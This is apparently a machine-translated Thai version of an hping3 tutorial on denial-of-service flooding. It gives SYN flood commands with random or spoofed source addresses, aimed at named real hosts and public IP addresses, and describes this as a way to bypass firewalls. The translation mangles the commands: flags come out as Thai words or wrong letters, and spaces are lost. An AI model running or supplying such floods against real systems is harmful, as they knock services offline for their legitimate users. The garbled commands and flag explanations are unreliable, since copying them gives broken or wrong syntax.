hping3 น้ำท่วม ddos

Hping3 Flood Ddos



บทช่วยสอนนี้เน้นที่การโจมตี DDOS (Distributed Denial of Service) โดยใช้เครื่องมือ hping3 หากคุณคุ้นเคยกับการโจมตี DOS (Denial of Service) และ DDOS แล้ว คุณสามารถอ่านต่อได้จากคำแนะนำเชิงปฏิบัติของ hping3 ไม่เช่นนั้น ขอแนะนำให้เรียนรู้เกี่ยวกับวิธีการทำงานของการโจมตีเหล่านี้

การโจมตี DOS


การโจมตีแบบ Denial of Service (DOS) เป็นเทคนิคง่ายๆ ในการปฏิเสธการเข้าถึงบริการ (นั่นคือสาเหตุที่เรียกว่าการปฏิเสธบริการโจมตี) การโจมตีนี้ประกอบด้วยการบรรทุกเป้าหมายมากเกินไปด้วยแพ็กเก็ตขนาดใหญ่ หรือมีปริมาณมาก







แม้ว่าการโจมตีนี้จะทำได้ง่ายมาก แต่ก็ไม่กระทบต่อข้อมูลหรือความเป็นส่วนตัวของเป้าหมาย แต่ก็ไม่ใช่การโจมตีแบบเจาะลึกและมีจุดมุ่งหมายเพื่อป้องกันการเข้าถึงเป้าหมายเท่านั้น
การส่งแพ็กเก็ตจำนวนหนึ่งทำให้เป้าหมายไม่สามารถจัดการกับผู้โจมตีได้ ทำให้เซิร์ฟเวอร์ไม่สามารถให้บริการผู้ใช้ที่ถูกกฎหมายได้



การโจมตี DOS ดำเนินการจากอุปกรณ์เครื่องเดียว ดังนั้นจึงเป็นการง่ายที่จะหยุดการโจมตีโดยการบล็อก IP ของผู้โจมตี แต่ผู้โจมตีสามารถเปลี่ยนและแม้กระทั่งปลอม (โคลน) ที่อยู่ IP เป้าหมาย แต่ไฟร์วอลล์จะจัดการกับการโจมตีดังกล่าวได้ไม่ยาก ตรงกันข้ามกับสิ่งที่เกิดขึ้นกับการโจมตี DDOS



การโจมตี DDOS

การโจมตีแบบปฏิเสธการให้บริการแบบกระจาย (DDOS) คล้ายกับการโจมตี DOS แต่ดำเนินการจากโหนดต่างๆ (หรือผู้โจมตีที่แตกต่างกัน) พร้อมกัน โดยทั่วไปแล้วการโจมตี DDOS จะดำเนินการโดยบ็อตเน็ต บ็อตเน็ตเป็นสคริปต์อัตโนมัติหรือโปรแกรมที่ติดไวรัสคอมพิวเตอร์เพื่อทำงานอัตโนมัติ (ในกรณีนี้คือการโจมตี DDOS) แฮ็กเกอร์สามารถสร้างบ็อตเน็ตและแพร่ระบาดในคอมพิวเตอร์หลายเครื่องซึ่งบ็อตเน็ตจะเปิดตัวการโจมตี DOS ความจริงที่ว่าบ็อตเน็ตจำนวนมากกำลังยิงพร้อมกันทำให้การโจมตี DOS เป็นการโจมตี DDOS (นั่นคือสาเหตุที่เรียกว่ากระจาย)





แน่นอนว่ามีข้อยกเว้นที่การโจมตี DDOS ดำเนินการโดยผู้โจมตีที่เป็นมนุษย์จริง ตัวอย่างเช่น กลุ่มแฮกเกอร์ Anonymous ที่รวมเข้ากับผู้คนหลายพันคนทั่วโลกที่ใช้เทคนิคนี้บ่อยครั้งมาก เนื่องจากใช้งานได้ง่าย (ต้องใช้เฉพาะอาสาสมัครที่แชร์สาเหตุเท่านั้น) ตัวอย่างเช่น การที่ผู้นิรนามปล่อยให้รัฐบาลลิเบียของกัดดาฟีขาดการเชื่อมต่อโดยสิ้นเชิงในระหว่างการรุกราน รัฐลิเบียถูกทิ้งให้ไม่มีที่พึ่งก่อนที่ผู้โจมตีหลายพันคนจากทั่วโลก

การโจมตีประเภทนี้ เมื่อดำเนินการจากโหนดต่างๆ จำนวนมาก ยากต่อการป้องกันและหยุด และโดยปกติต้องใช้ฮาร์ดแวร์พิเศษในการจัดการ นี่เป็นเพราะไฟร์วอลล์และแอปพลิเคชั่นป้องกันไม่ได้เตรียมรับมือกับผู้โจมตีหลายพันรายพร้อมกัน นี่ไม่ใช่กรณีของ hping3 การโจมตีส่วนใหญ่ที่ทำผ่านเครื่องมือนี้จะถูกบล็อกโดยอุปกรณ์ป้องกันหรือซอฟต์แวร์ แต่ก็มีประโยชน์ในเครือข่ายท้องถิ่นหรือกับเป้าหมายที่มีการป้องกันไม่ดี



เกี่ยวกับ hping3

เครื่องมือ hping3 ช่วยให้คุณสามารถส่งแพ็คเก็ตที่จัดการได้ เครื่องมือนี้ช่วยให้คุณควบคุมขนาด ปริมาณ และการแตกแฟรกเมนต์ของแพ็กเก็ต เพื่อโอเวอร์โหลดเป้าหมายและข้ามหรือโจมตีไฟร์วอลล์ Hping3 มีประโยชน์สำหรับวัตถุประสงค์ด้านความปลอดภัยหรือการทดสอบความสามารถ โดยคุณสามารถทดสอบประสิทธิภาพของไฟร์วอลล์ และหากเซิร์ฟเวอร์สามารถรองรับแพ็คเก็ตจำนวนมากได้ ด้านล่างนี้ คุณจะพบคำแนะนำเกี่ยวกับวิธีการใช้ hping3 เพื่อวัตถุประสงค์ในการทดสอบความปลอดภัย

เริ่มต้นการโจมตี DDOS โดยใช้ hping3:

บน Debian และ Linux รุ่นพื้นฐาน คุณสามารถติดตั้ง hping3 ได้ด้วยการเรียกใช้:

#ฉลาดติดตั้งhping3-และ

การโจมตี DOS อย่างง่าย (ไม่ใช่ DDOS) จะเป็น:

#sudohping3-NS --น้ำท่วม -V -NS 80170.155.9.185

ที่ไหน:
ซูโด: ให้สิทธิ์ที่จำเป็นในการรัน hping3
hping3:
เรียกโปรแกรม hping3
-NS: ระบุแพ็กเก็ต SYN
-น้ำท่วม: ขึ้นอยู่กับดุลยพินิจ การตอบกลับจะถูกละเว้น (นั่นคือสาเหตุที่การตอบกลับจะไม่แสดง) และแพ็คเก็ตจะถูกส่งอย่างรวดเร็วที่สุด
-วี: คำฟุ่มเฟือย
-p 80: พอร์ต 80 คุณสามารถแทนที่หมายเลขนี้สำหรับบริการที่คุณต้องการโจมตี
170.155.9.185: IP เป้าหมาย

น้ำท่วมโดยใช้แพ็กเก็ต SYN กับพอร์ต 80:

ตัวอย่างต่อไปนี้แสดงให้เห็นถึงการโจมตี SYN ต่อ lacampora.org:

#sudohping3 lacampora.org-NS -NS -NS 120 -NS -NS 80 --น้ำท่วม --rand-source

ที่ไหน:
Lacampora.org: คือเป้าหมาย
-NS: ผลลัพธ์สั้น ๆ
-NS: แสดง IP เป้าหมายแทนโฮสต์
-d 120: กำหนดขนาดแพ็คเก็ต
–rand-ที่มา: ซ่อนที่อยู่ IP

ตัวอย่างต่อไปนี้แสดงตัวอย่างที่เป็นไปได้ของน้ำท่วมอื่น:

SYN ท่วมพอร์ต 80:

#sudohping3--rand-sourceivan.com-NS -NS -NS 80 --น้ำท่วม

ด้วย hping3 คุณยังสามารถโจมตีเป้าหมายของคุณด้วย IP ปลอม เพื่อเลี่ยงผ่านไฟร์วอลล์ คุณยังสามารถโคลน IP เป้าหมายของคุณเองหรือที่อยู่ที่อนุญาตใดๆ ที่คุณอาจทราบได้ (คุณสามารถทำสำเร็จได้ด้วย Nmap หรือดมกลิ่นเพื่อรับฟัง การเชื่อมต่อ)

ไวยากรณ์จะเป็น:

#sudohping3-ถึง <IP ปลอม> <เป้า> -NS -NS -NS 80 --เร็วขึ้น -c2

ในตัวอย่างนี้ การโจมตีจะดูเหมือน:

#sudohping3-ถึง190.0.175.100 190.0.175.100-NS -NS -NS 80 --เร็วขึ้น -c2

ฉันหวังว่าคุณจะพบว่าบทช่วยสอนนี้ใน hping3 มีประโยชน์ ติดตาม LinuxHint เพื่อรับเคล็ดลับและการอัปเดตเพิ่มเติมเกี่ยวกับ Linux และระบบเครือข่าย